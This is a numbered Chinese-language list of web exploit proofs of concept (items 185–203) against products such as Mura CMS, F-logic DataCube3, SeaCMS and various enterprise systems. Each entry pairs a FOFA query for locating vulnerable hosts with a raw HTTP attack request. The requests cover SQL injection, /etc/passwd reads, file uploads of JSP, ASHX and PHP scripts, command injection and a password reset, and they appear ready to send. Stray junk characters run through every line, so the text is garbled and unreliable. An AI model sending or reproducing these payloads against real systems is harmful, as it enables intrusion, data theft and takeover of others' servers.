) h7 p% X+ w: W) x! h
2 S( ~( _* `) e" ? I
185. 瑞友天翼应用虚拟化系统SQL注入
' w$ n$ ?1 [3 C5 S6 u% mversion < 7.0.5.1
0 A9 Z. o% k) W( fFOFA:app="REALOR-天翼应用虚拟化系统". j, b( q4 h9 V7 c
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
; u4 z4 g1 @+ i- ^9 ^+ }Host: host
2 f' o( v: ]% E, s$ b m/ ]% L/ D4 e0 L2 {, {
- y- j u. p- a* Z186. F-logic DataCube3 SQL注入+ C- Z# @6 R$ ?$ T
CVE-2024-31750
4 p8 J4 O3 z. W5 ]% |0 XF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
3 C i4 R. {5 z* |, HFOFA:title=="DataCube3"
7 J5 w" y7 T* x) r* U& T n. a. l6 f: MPOST /admin/pr_monitor/getting_index_data.php HTTP/1.13 x- X( ]* m' H% y9 f4 A" k, X/ {
Host: your-ip/ F, N% E# L# u) j+ G, j: r$ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
& |' c+ e1 Y4 Z( j/ M: LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
2 f0 F* @$ @3 `; D d* kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 X* H8 m, @' w) r
Accept-Encoding: gzip, deflate' u) t/ V3 z- r
Connection: close' _" I ^& ?/ {" J6 Q4 v/ l
Content-Type: application/x-www-form-urlencoded3 u. a/ v' v8 K7 n6 v7 y) B( t
4 o+ X1 ^0 z' O2 Z! d7 L% V( Greq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
1 x! d- n6 M) d
3 b R! q9 q, H7 ?$ p5 ]$ c1 Y# ?. x6 v# @
187. Mura CMS processAsyncObject SQL注入
5 Z. K7 z; D5 u1 G) xCVE-2024-32640. F" X: r) G8 G+ N
FOFA:"Mura CMS"
x: M& ^, ?9 SPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1' j+ A9 P' u) e/ q( t
Host: your-ip$ \, A z7 M! g" }" k1 t
Content-Type: application/x-www-form-urlencoded
' R; i) \) m; _3 s
; X% \8 M+ s0 S R
* q, f3 A9 O0 Q2 p+ w1 `object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
# S' O! l4 y1 c$ K; X+ P+ n5 v2 g( A7 B$ d% \5 |
& }, m1 `: H5 }: j8 ~" V188. 叁体-佳会视频会议 attachment 任意文件读取0 i7 q; O3 Q9 p9 }
version <= 3.9.7
E' C+ x, b1 U7 z8 j% t! |, yFOFA:body="/system/get_rtc_user_defined_info?site_id"- C9 _( z8 q- l# O/ b; E# S7 S
GET /attachment?file=/etc/passwd HTTP/1.1- j/ V$ q2 M; X9 B+ e# a
Host: your-ip
( A3 \% t9 e- I/ jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- f3 M! U5 }1 V3 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 b( y+ l9 n% C1 K b) k
Accept-Encoding: gzip, deflate
4 O) Q5 Q% M' h( L. t; KAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 E% I$ ]) P* f: f; ]Connection: close' r4 _" {: c5 Q( S
2 x, B( ], g2 J5 o- {
# u: O/ P% L" q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 q. d3 c) s9 w9 U, ]
FOFA:app="LANWON-临床浏览系统"
$ } t9 E- Y' g2 T( A4 OGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
0 X' F5 u/ K) b% z* {8 q% RHost: your-ip8 I# g9 c7 S8 J+ b
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& t. R* @, m( g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ Y' x- K' }# N; j1 Z" }' D; y3 ~
Accept-Encoding: gzip, deflate
6 l4 Z* w# _0 x& vAccept-Language: zh-CN,zh;q=0.97 W0 v0 A" [9 Q6 Q$ ^
Connection: close7 P% L" q! x' s/ R
+ M) W. W2 r- T1 f8 \
0 U, Y: B) c5 |' W% l# | k
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& N, `5 k" H8 e& G( V& q( t6 @8 OFOFA:title=="短视频矩阵营销系统"9 M* F' N3 }- d1 Y* L
POST /index.php/admin/Userinfo/poihuoqu HTTP/2, n; e) q, Z7 J$ `
Host: your-ip
! z7 m v% c4 h9 T9 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
0 x: y' H. S# \4 `4 J6 l! kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* {; a' H5 Y) |7 y1 W& Z7 o0 G6 l& u: n0 DContent-Type: application/x-www-form-urlencoded
& Y5 F3 S: l* j, O. q/ T" hAccept-Encoding: gzip, deflate6 f3 F7 w6 B, V+ P! l2 o( x
Accept-Language: zh-CN,zh;q=0.9
^$ k0 J& j3 l* _; S8 i' t
0 ]4 r3 p& M6 k) {poi=file:///etc/passwd8 o3 I3 f9 f) [/ h2 X$ t
( o m% D2 D5 l c1 n4 k8 C0 ]2 W& M: P3 J, \4 p
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
u7 m$ [! R3 e3 F& _, YFOFA:body="/CDGServer3/index.jsp"
% ?% \- h5 n$ K0 mPOST /CDGServer3/js/../NavigationAjax HTTP/1.1% n) O* P4 e, `. ?5 v6 O5 q
Host: your-ip- Y7 \1 j9 R( }2 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: B# f- v6 c4 g; ?2 yContent-Type: application/x-www-form-urlencoded
% H0 u& B6 Y! Y) H0 f4 t" E* Y; Q- f9 c' W: E
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=+ L3 w* |; M# ?# G$ P- V+ m
: k3 |9 S2 k* ]+ {
|* v W. v6 B8 Y- ]) `) Q. ?192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( [5 z7 t2 h- V1 h% yFOFA:title="用户登录_富通天下外贸ERP"
1 p: c; E) }: w! T. ePOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
& x! s0 H8 V2 @( S& L) BHost: your-ip# Q% q1 X) z, H+ P+ }. d; d* i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36. N( t/ L) z4 D+ M2 N* x
Content-Type: application/x-www-form-urlencoded
% ?9 c2 \( A U/ }; u
( U" a- N/ z# g. r6 l0 C3 H# W& O, ^/ `0 s
<% @ webhandler language="C#" class="AverageHandler" %>7 w p( I9 H" N% H, _8 ?
using System; T/ [. F- k, _0 Q
using System.Web;! c P6 r3 I4 ?4 p% @5 P
public class AverageHandler : IHttpHandler
" e' x4 | L5 O7 o{
8 C, b' C& B: u* S* w$ zpublic bool IsReusable8 s7 N, R9 b; p
{ get { return true; } }' g, }% T8 c2 D/ P- O
public void ProcessRequest(HttpContext ctx)
* i' Q# R, s( c2 b% z; F; ^7 X2 k7 \{: X' x1 t4 A2 |/ J6 ^ L
ctx.Response.Write("test");; Y; s, n% i" w# V/ ?
}
; g( x0 [, c2 [7 G7 H" I}1 A9 `# W, X1 y6 n3 X. k2 G
& v1 i/ V; i* U+ V2 \6 y( O7 @5 p: C1 K& K; e1 T3 W
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行 f; s2 U. w+ E; `, J3 G
FOFA:body="山石云鉴主机安全管理系统"
. c+ p+ c$ K( j% r# EGET /master/ajaxActions/getTokenAction.php HTTP/1.1
) m5 i; H/ D4 S' IHost:
% a$ f$ L! @% a- x8 t' WCookie: PHPSESSID=2333333333333;
5 S5 G/ l$ t. B3 kContent-Type: application/x-www-form-urlencoded
1 G# \- l" P8 i+ p6 R$ CUser-Agent: Mozilla/5.0
, @7 F) j8 z& s' _8 D( ]
5 p' c. ~ k9 a% ]- r5 @! q }" e% z D9 ?- k- @" A
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
) T( x6 y% _1 f5 AHost:
% c" G0 k3 p3 {: ?/ l' b1 MUser-Agent: Mozilla/5.0
' |: @; {* E2 o0 x/ s( aAccept-Encoding: gzip, deflate" f& j4 A3 \. F) K M5 Y" Y5 z
Accept: */*/ x0 }% N; F: C9 Z
Connection: close* H3 W# m0 |3 D! X, z
Cookie: PHPSESSID=2333333333333;6 _: T0 o# d: D( n( a9 }
Content-Type: application/x-www-form-urlencoded
# f( g% ^$ n; @, g$ wContent-Length: 84" o# _; Y2 N) t' G; \9 b
& l: g3 ^7 }& a$ ]4 h$ E9 jparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')3 H& [# K- J3 W- O& r3 u8 e4 p
/ ~+ v; |# g0 B* ~9 S. m5 L
' H3 t1 S3 i+ t. ]& p5 Y6 AGET /master/img/config HTTP/1.10 Q0 b f1 a) v
Host:
# S$ k+ T0 A; PUser-Agent: Mozilla/5.0
' T3 o) \/ {) R; E: ~+ h0 i" S8 L/ s3 V0 j) K1 o
1 ~. N3 l7 K4 S3 @4 W+ W194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
, o9 p0 h) P: X3 p8 IFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
+ [0 C; z( L, `: D$ T u: i4 n" Y6 D& t5 R8 Q- t+ W% ]; x
POST /servlet/uploadAttachmentServlet HTTP/1.1
/ v K0 J! w6 a2 ]Host: host; G$ A8 U+ ^' t2 { M* E: q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
+ T! L1 I5 Y6 m4 ~/ H9 A% sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* C. w# D$ ^/ j7 d' ^" y2 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 O- Q8 ]3 F# {3 D- Y2 ]Accept-Encoding: gzip, deflate
- y0 a: P% ?$ D# A4 CConnection: close$ G0 G" {$ _5 y* A7 U9 O% d7 m0 |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 D: n$ u. |( O------WebKitFormBoundaryKNt0t4vBe8cX9rZk3 [; H6 X; ^& u5 F
3 l _1 a( `: V9 @6 e
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"# L; b7 G, D+ R
Content-Type: text/plain' D6 k6 J5 m% k# \/ K
<% out.println("hello");%>, m" t7 R$ \4 K ~. w
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
( ?, H: G& A i' f ]Content-Disposition: form-data; name="json"2 R7 X( B F! v* r. S7 Z
{"iq":{"query":{"UpdateType":"mail"}}}( y! t* R0 T2 A0 I9 H" f: @* K! J, L
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
/ j& x; H8 Z* {. M6 \+ x
9 O* |" i; ]$ ~. U! P1 B6 L% K1 i: p/ r N. _9 m# ~
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
) @- N& }) t0 a0 F1 u" F- U' k; U/ F4 S, gFOFA:title=="飞鱼星企业级智能上网行为管理系统- S# B& f9 ~- ^' }/ Q
POST /send_order.cgi?parameter=operation HTTP/1.1) y5 E- O( g& [& z: G
Host: 127.0.0.1
3 @$ B* N6 [! C6 K6 YPragma: no-cache! g# o* @) q6 K! E/ X1 H1 W
Cache-Control: no-cache
2 ^7 r4 Y7 _' T y. F, }2 H% O& `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ d X, z: v8 [4 ^4 ^* o. {* c$ |) ~
Accept: */** O9 S) o Z7 G, ~( K
Accept-Encoding: gzip, deflate I& T* ?$ ^ ]
Accept-Language: zh-CN,zh;q=0.9) G$ o9 ~. C/ F3 d. J7 Z" Y
Connection: close
# l1 }" u* a! L g9 M- c" m. ]0 mContent-Type: application/x-www-form-urlencoded
! W0 Q, u- @1 c0 |Content-Length: 68
( [) ?/ `+ q, a
- H0 x) Z, e6 Z- p3 w# y{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
( d& T! d( C7 j" [: a* q" H% U8 z' A: Q$ i
- i2 o6 n' C# m. Z. L) q: r3 ?& k. Y5 q7 p
196. 河南省风速科技统一认证平台密码重置: j. ]3 R# {) _. F4 i. [
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"4 G+ s4 u- ~* Y! Y
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
1 j8 H1 j! t4 x9 T4 `/ ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) d4 J; ~5 Q! H3 vContent-Type: application/json;charset=UTF-81 f' o3 J: \6 p! N9 I3 n1 b
X-Requested-With: XMLHttpRequest7 n* |' q. a7 c1 M* k9 R& x$ \
Host:
1 B1 Q* h7 k% N- JAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 y) X1 T0 y! m9 o% R* t2 n2 M
Content-Length: 45
1 {2 P2 a- T2 Y8 s: Z6 ~Connection: close4 C0 n2 v6 V0 y! B
* f$ Z9 ?/ ?/ H: A& U; D. z5 N{"xgh":"test","newPass":"test666","email":""}
- T5 w) d( |8 Q) M& E' E& I
5 q# Z% s% h4 H) q
& N1 q: ~: x9 V' V* p
* b- n- `7 T+ b4 s0 e0 N197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
1 t8 {' ~1 E( o; b9 T: h8 XFOFA:app="浙大恩特客户资源管理系统"
3 O3 g- d; k5 c( ?$ W( w* @GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.10 x u) e1 z# y7 w, n. H$ F) I
Host:( t% V% Y: T2 q( M! v; U/ Y, g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" m( A2 n1 b8 E; m9 y2 Q# \1 s
Accept-Encoding: gzip, deflate
! Y( E6 i' D) @; |1 K3 JConnection: close
; N) P, H1 j4 Z3 {# z2 |( S
; y7 J) P5 I( L: t2 a4 M Z" n% F% i. x. G! j0 f
1 @( I' {& D9 @# S/ l) U- e
198. 阿里云盘 WebDAV 命令注入
6 I& X+ u, h* i# \! E! yCVE-2024-296401 u) b* m5 a8 r0 y
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
* }2 v& ?4 s% ]+ F5 E5 s! p/ S. bCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
- W# s- V6 q4 J3 l% D* C& hAccept: */*
4 G2 l5 o$ K, w4 LAccept-Encoding: gzip, deflate, R) A* d3 ^6 g# x8 I+ T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
# U$ D" Q; y/ ?: H+ YConnection: close. Q. G) ^7 e1 i1 [. v2 R) ^
; C4 g# J7 x9 h" X0 N1 ~# S: n9 J7 V
199. cockpit系统assetsmanager_upload接口 文件上传2 o5 v% G3 b% I+ Q# |6 _; P
6 j' R; M: x) g: \7 S4 _1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:/ @7 r' E: |2 |) u3 ^2 m+ a
GET /auth/login?to=/ HTTP/1.1& d& X4 a) j$ x8 l
- U/ E8 y% K: ^. u9 v响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" U! z+ Y& `/ F7 Y
! ~/ d6 r2 v) @! C2 Q7 z" x
2.使用刚才上一步获取到的jwt获取cookie:
/ O0 `) N: ]; \
" x+ U7 D, m# U: c) cPOST /auth/check HTTP/1.1. V4 i& U5 x% c; u% \
Content-Type: application/json* q/ g5 O" M! X3 h" O5 k0 G6 U3 E, z
3 J2 ~' a( h; B% Y1 g4 ~1 P{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}$ s$ p) H' i! L
. Y9 X' l# a& b' L- Z, P2 G$ `9 K
响应:200,返回值:; a* h+ K& y5 S7 T8 r0 {
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/# [' H3 _5 q( ~" Q4 C' D8 M
Fofa:title="Authenticate Please!"
( c! s% K/ p; ]4 T8 C, oPOST /assetsmanager/upload HTTP/1.1& b% a' @& T) f) i; Z) q) C0 c- @! o
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
$ `, S: a& B3 y0 ?6 NCookie: mysession=95524f01e238bf51bb60d77ede3bea92" y( ?' I; O n6 g2 h
7 u, f1 R" V& J6 @3 s
-----------------------------36D28FBc36bd6feE7Fb3( f, b6 z! c5 c
Content-Disposition: form-data; name="files[]"; filename="tttt.php"1 N7 ]3 I% |1 T4 s( o
Content-Type: text/php
# I) q/ |. K% W( p
7 {3 Y- N$ n8 j8 [3 d' {: s<?php echo "tttt";unlink(__FILE__);?>
8 n' `" r" X Z1 b8 \& k-----------------------------36D28FBc36bd6feE7Fb3
6 s8 G5 q2 S) h# X; DContent-Disposition: form-data; name="folder"- u# [; C+ |: _0 l! _- H# W. R
/ D! d# H& f1 ?" [: U0 Q-----------------------------36D28FBc36bd6feE7Fb3--$ d. T3 Z( g; y+ c0 k0 m
. t. R- g* |0 \* u
& e, X( T5 p3 r; t0 b' ~5 J; _
/storage/uploads/tttt.php. K6 a" f8 K+ o0 M9 C3 P
) s' q& @: _4 r4 @. h7 l
200. SeaCMS海洋影视管理系统dmku SQL注入) V" A. a) N) Z$ M
FOFA:app="海洋CMS"
- a* W% t z" L" W: lGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
/ K; E7 g: ?% j R0 HCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
# B) P2 V8 a1 }% i- dUpgrade-Insecure-Requests: 13 R; c) E ~( q
Cache-Control: max-age=02 J6 {& Y8 ?& I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* x$ F* X4 n' _5 F3 e5 WAccept-Encoding: gzip, deflate$ c$ j* [6 H/ i8 G8 ?
Accept-Language: zh-CN,zh;q=0.97 x3 O# Y( o3 m& ~; Q
@# B9 o9 I* j8 F# T) A
# F) B5 i4 Y6 f1 [201. 方正全媒体新闻采编系统 binary SQL注入( q7 x5 b2 I- C* z4 F# }+ c* S
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! s3 X6 q3 {! XPOST /newsedit/newsplan/task/binary.do HTTP/1.1+ @- u5 ^& C+ n! j6 }1 Y; K9 w; h
Content-Type: application/x-www-form-urlencoded
% R) T* N6 k6 G9 L: A1 s) ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. s7 r0 D1 w; I0 R# H; O0 M' ]
Accept-Encoding: gzip, deflate% e% \! [8 _4 V) \' }" U
Accept-Language: zh-CN,zh;q=0.9" y, F6 V) A( U* w9 }9 Q
Connection: close
\1 t% g$ j- j( Z) v* ]# J1 l! q$ g" W0 M7 A$ r
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
& \) \3 M( g' P
4 H$ G, z( v8 @
* Q) X* L' O( O2 I$ ^# N202. 微擎系统 AccountEdit任意文件上传
6 U$ |- W w8 z0 j, ^* rFOFA:body="/Widgets/WidgetCollection/"/ V, H' ?% O C, V, C
获取__VIEWSTATE和__EVENTVALIDATION值. c5 i, }: }5 \* l" t
GET /User/AccountEdit.aspx HTTP/1.1 B! \! c: L/ z# H; z
Host: 滑板人之家1 ]1 u( y0 S% N* N3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31% A9 ?" z( @7 _( d; g# s
Content-Length: 01 x# Z: c' f7 n" b# \
8 l) V. o1 a# B* h
5 x1 z) d7 _9 f6 Q7 A替换__VIEWSTATE和__EVENTVALIDATION值3 L: `; O0 V" \5 y
POST /User/AccountEdit.aspx HTTP/1.1
( L, B9 V2 b0 ~% w- tAccept-Encoding: gzip, deflate, br, P7 K3 {/ K; h+ b7 X
Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356877 z, h$ e/ n& ]
& X4 {0 P+ V1 ~& k7 e-----------------------------786435874t385875938657365873465673587356872 V7 L) z; P, p* L$ c& Y
Content-Disposition: form-data; name="__VIEWSTATE"
2 j+ S9 ~2 r% w
8 N3 t* x. P; v. L__VIEWSTATE# z; J5 d, @6 ?$ t
-----------------------------786435874t38587593865736587346567358735687
9 w. n7 I% F" @* @2 h$ lContent-Disposition: form-data; name="__EVENTVALIDATION"
) x2 f/ w I. L; t$ d# ^) E! Y- j! G2 z
__EVENTVALIDATION% X& W( N# O/ m5 M7 M. c# z
-----------------------------786435874t38587593865736587346567358735687$ t3 A8 i- X+ _5 `' r. p6 G4 l
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
, e5 o- E4 E$ W7 W }# D* F( e G6 yContent-Type: text/plain8 S( G3 m/ ~, z$ n6 N
" v: c; v, r$ I0 x9 M: p
Hello World!# s0 s4 C, f) L; L4 h- `
-----------------------------786435874t38587593865736587346567358735687
4 b7 N, _+ v( N3 r O6 c9 }Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
8 E j1 y* c( `& q5 [0 D+ j5 R+ E+ c1 |& s8 u; Y) g. |
上传图片
/ |2 H) A; A( }- m9 `-----------------------------786435874t38587593865736587346567358735687
5 i# [. i9 e- \Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
# w a* s0 ?! u/ D' m& o, _. Y9 W$ f- J+ i$ I5 I6 ^ @4 D* Q K
# `5 F7 S2 \; c0 C) ?& y4 s
-----------------------------786435874t38587593865736587346567358735687
' ~4 V! J ? ZContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"0 ]/ Q' @% K0 E* W: \9 N2 Z$ |3 z
8 {! R. r* t) k% r, A1 d, g
, C0 u9 ~ S3 d. M) l-----------------------------786435874t38587593865736587346567358735687--
9 K# ^ D- R( H9 q
) m. k& p: ~+ W' W( @1 `3 |
: q5 n/ h4 p4 m. a8 I: m/_data/Uploads/1123.txt
6 F. I* m3 l: `) [( |5 o; K* i5 L
' b8 M8 f' C& ]1 e8 F3 p5 O4 J4 }203. 红海云EHR PtFjk 文件上传: q7 V, l( H) h
FOFA:body="RedseaPlatform"% C" _# \0 s% H6 S* z# J2 m0 n5 Q
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
: C0 Y3 |7 s) ]) @5 aHost: x.x.x.x
9 Z7 ]' }3 K' m5 pAccept-Encoding: gzip
# @$ t( e6 H9 ?6 I$ f, LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" u$ P$ P5 U" m6 {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4& D8 \) C; _# _" Y$ f S
Content-Length: 210
9 k3 |' n. P1 ^! P$ `) J; n. q) p
4 k6 c. d5 m& K1 y------WebKitFormBoundaryt7WbDl1tXogoZys4
$ W. V, R# ~0 e3 TContent-Disposition: form-data; name="fj_file"; filename="11.jsp"% r. K; S6 [9 ?# b( q
Content-Type:image/jpeg* e7 n) o4 y/ n. a1 s+ T2 Z3 D
: b3 k& h/ B+ I<% out.print("hello,eHR");%>! o! \4 R2 \( {4 ^* f1 G. M- ], f
------WebKitFormBoundaryt7WbDl1tXogoZys4--' C) p. C4 C7 }+ j) a! a
! \* M& Q) Q$ u0 g
8 J$ d6 \( Y! ]! M" K/ F3 m* P2 K t2 R6 V. J, s
y& B! C1 z# e9 P
( f3 V, [7 g; N' B+ `; w
9 a& R q! W6 y" D8 _, i0 `% ?* c
|